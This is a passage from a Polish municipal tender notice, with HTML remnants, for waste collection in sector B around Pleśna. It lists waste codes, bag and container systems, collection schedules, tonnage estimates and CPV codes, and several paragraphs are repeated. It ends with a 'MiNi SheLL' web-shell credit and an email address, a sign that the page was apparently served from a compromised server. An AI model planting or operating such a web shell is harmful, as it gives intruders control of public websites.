Wykonawca jest zobowiązany dotrzeć do osób wytwarzających odpady i zebrać wszystkie wystawione odpady.
Wykonawca ma obowiązek realizować niniejszą usługę zgodnie z przepisami ustawy z dnia 13 września            1996 r. o utrzymaniu czystości i porządku w gminach (tekst jednolity Dz.U. z 2012 r. poz. 391 ze zmianami). 
Niesegregowane odpady komunalne, pozostałości z sortowania odpadów komunalnych musi  być poddane odzyskowi lub unieszkodliwieniu na obszarze województwa małopolskiego w instalacjach regionalnych wskazanych w Wojewódzkim Planie Gospodarki Odpadami.
Wykonawca będzie dostarczał Zamawiającemu raz na kwartał sprawozdania z ilości zebranych i zagospodarowanych odpadów. Termin złożenia sprawozdania oraz jego forma muszą spełniać wymagania rozporządzenia Ministra Środowiska z dnia 15 maja 2012r. w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz. U. z 2012 r. poz. 630).

Wspólny Słownik Zamówień (CPV)
90510000-5 Usuwanie i obróbka odpadów
90511000-2    Usługi wywozu odpadów
90513100-7    Usługi wywozu odpadów pochodzących z gospodarstw domowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.00.00-5, 90.51.10.00-2, 90.51.31.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> obejmującą odbieranie i zagospodarowanie odpadów z sektora B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> który następujące miejscowości: Pleśna, Łowczówek, Świebodzin, Rychwałd, Lichwin, Woźniczna. 
Ilość mieszkańców w sektorze: ok. 6583 osób, ilość budynków mieszkalnych: ok. 1573.
Wywóz odpadów obejmuje:
1.	Niesegregowane (zmieszane ) odpady komunalne kod 20 03 01 
Właściciele nieruchomości zamieszkałych - odpady komunalne gromadzone będą w pojemnikach                          o pojemności 120 l. Pojemniki zapewni Wykonawca i ustawi je w miejscach wskazanych przez właścicieli nieruchomości. 
Odbieranie odpadów komunalnych od właścicieli posesji zamieszkałych odbywać się będzie co dwa tygodnie zgodnie z harmonogramem wywozu.

2.	Selektywnie zbierane odpady komunalne kod 20 01 01, 20 01 02,  20 01 39, 20 01 40,  20 02 01, 15 01 01, 15 01 02, 15 01 03, 15 01 04, 15 01 05, 15 01 06, 15 01 07, 16 01 03

Właściciele nieruchomości zamieszkałych selektywna zbiórka odpadów komunalnych realizować będą                  w systemie workowym i pojemnikowym:
1)	W systemie workowym wprowadza się 4 rodzaje worków:
- żółty - tworzywa sztuczne, opakowania wielomateriałowe, metal,
- niebieski - papier, 
- czarny - odpady biodegradowalne,
- zielony - szkło, 
Worki zapewni Wykonawca. Grubość worków powinna być tak dobrana, aby zapewnić ich szczelność. Worki muszą być opatrzone nadrukiem na jaki rodzaj odpadu są przeznaczone. Dodatkowo na worku muszą widnieć adres i dane kontaktowe Wykonawcy.
Wywóz odpadów komunalnych selektywnie gromadzonych w workach bezpośrednio od mieszkańców - 1 raz w miesiącu, na podstawie harmonogramu wywozu, z zastrzeżeniem, że zbiórka odpadów biodegradowalnych odbywała się będzie nie rzadziej niż 2 razy w miesiącu. 
Wykonawca sprawdza, rzetelność segregacji odpadów przez gospodarstwa domowe - wyrywkowo. W przypadku stwierdzenia nieprawidłowości Wykonawca niezwłocznie powiadamia Zamawiającego.
Wykonawca przedłoży odrębny harmonogram wywozu odpadów biodegradowalnych.

2)	System pojemnikowy polegał będzie na gromadzeniu odpadów w pojemnikach typu dzwon ustawionych w każdej miejscowości na szkło, papier, metal oraz pojemników siatkowych na tworzywa sztuczne, odpady wielomateriałowe. Pojemniki zapewni Zamawiający. 
Wywóz na zlecenie telefoniczne, jednak nie rzadziej niż raz na 2  miesiące. 

Szacowana ilość wywozów z pojemników z sektora A 225 razy.
Szacowana ilość wywozów z pojemników z sektora B 270 razy.

3.	odpady wielkogabarytowe, zużyty sprzęt elektryczny i elektroniczny- 20 03 07, 20 01 36, 20 01 23*, 20 01 35*
Sektor B
Zbiórka odpadów wielkogabarytowych oraz zużytego sprzętu elektrycznego i elektronicznego  odbywała się będzie w dwojaki sposób:
a) zbiórka stacjonarna w kontenerach typu KP 7 o poj. 7 m3, ustawionych w niżej wymienionych miejscach,  na odpady wielkogabarytowe. 
- Pleśna - działka nr 246/1 (teren dawnej oczyszczalni typu KOS) - 1 kontener
- Lichwin - działka nr 581/1 (obok szkoły) - 1 kontener
b) raz w roku (w miesiącu marzec) zbiórka na zasadzie wystawki sprzed posesji.  
Ilość wywozów  36 razy.

Kontenery dla poszczególnych sektorów zapewni Zamawiający. Zamawiający wskazuje miejsce lokalizacji kontenerów, a ich organizacja,  utrzymanie oraz obsługa leży po stronie Wykonawcy  warunki jakie musi spełniać punkt zbierania odpadów określone są w Rozporządzeniu Ministra Gospodarki i Pracy z dnia                        4 sierpnia 2004 r. w sprawie szczegółowego sposobu postępowania z olejami odpadowymi ( Dz. U. z 2004 r. Nr 192, poz. 1968). 
Ilość wywozu w trakcie obowiązywania umowy w każdym z sektorów po 36 razy. 
Usługa wykonywana będzie zgodnie z harmonogramem dostarczonym przez Wykonawcę.

4.	20 01 32, leki inne niż wymienione w 20 01 31
Usługa wywozu dla sektora A odbywać się będzie z Punktu Aptecznego w Janowicach z częstotliwością raz na kwartał.
Usługa wywozu dla sektora B odbywać się będzie z Apteki Arnika ( na przeciwko Urzędu Gminy) z częstotliwością raz na kwartał.
5.	Przewidywana ilość wszelkich odpadów w ciągu 1,5 roku:2)	dla sektora B:
a)	odpady segregowane -  300 Mg,
b)	odpady niesegregowane -   830 Mg.

Ilości wywożonych odpadów podana w Części III SIZW mogą ulec zmianie w czasie obowiązywania umowy w granicach +/-5% zaokrąglonej do pełnej liczby. Z tytułu różnicy w  ilości wywożonych odpadów Zamawiający nie będzie ponosił dodatkowych kosztów. 
Wykonawca jest zobowiązany dotrzeć do osób wytwarzających odpady i zebrać wszystkie wystawione odpady.
Wykonawca ma obowiązek realizować niniejszą usługę zgodnie z przepisami ustawy z dnia 13 września            1996 r. o utrzymaniu czystości i porządku w gminach (tekst jednolity Dz.U. z 2012 r. poz. 391 ze zmianami). 
Niesegregowane odpady komunalne, pozostałości z sortowania odpadów komunalnych musi  być poddane odzyskowi lub unieszkodliwieniu na obszarze województwa małopolskiego w instalacjach regionalnych wskazanych w Wojewódzkim Planie Gospodarki Odpadami.
Wykonawca będzie dostarczał Zamawiającemu raz na kwartał sprawozdania z ilości zebranych i zagospodarowanych odpadów. Termin złożenia sprawozdania oraz jego forma muszą spełniać wymagania rozporządzenia Ministra Środowiska z dnia 15 maja 2012r. w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz. U. z 2012 r. poz. 630).

Wspólny Słownik Zamówień (CPV)
90510000-5 Usuwanie i obróbka odpadów
90511000-2    Usługi wywozu odpadów
90513100-7    Usługi wywozu odpadów pochodzących z gospodarstw domowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.00.00-5, 90.51.10.00-2, 90.51.31.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com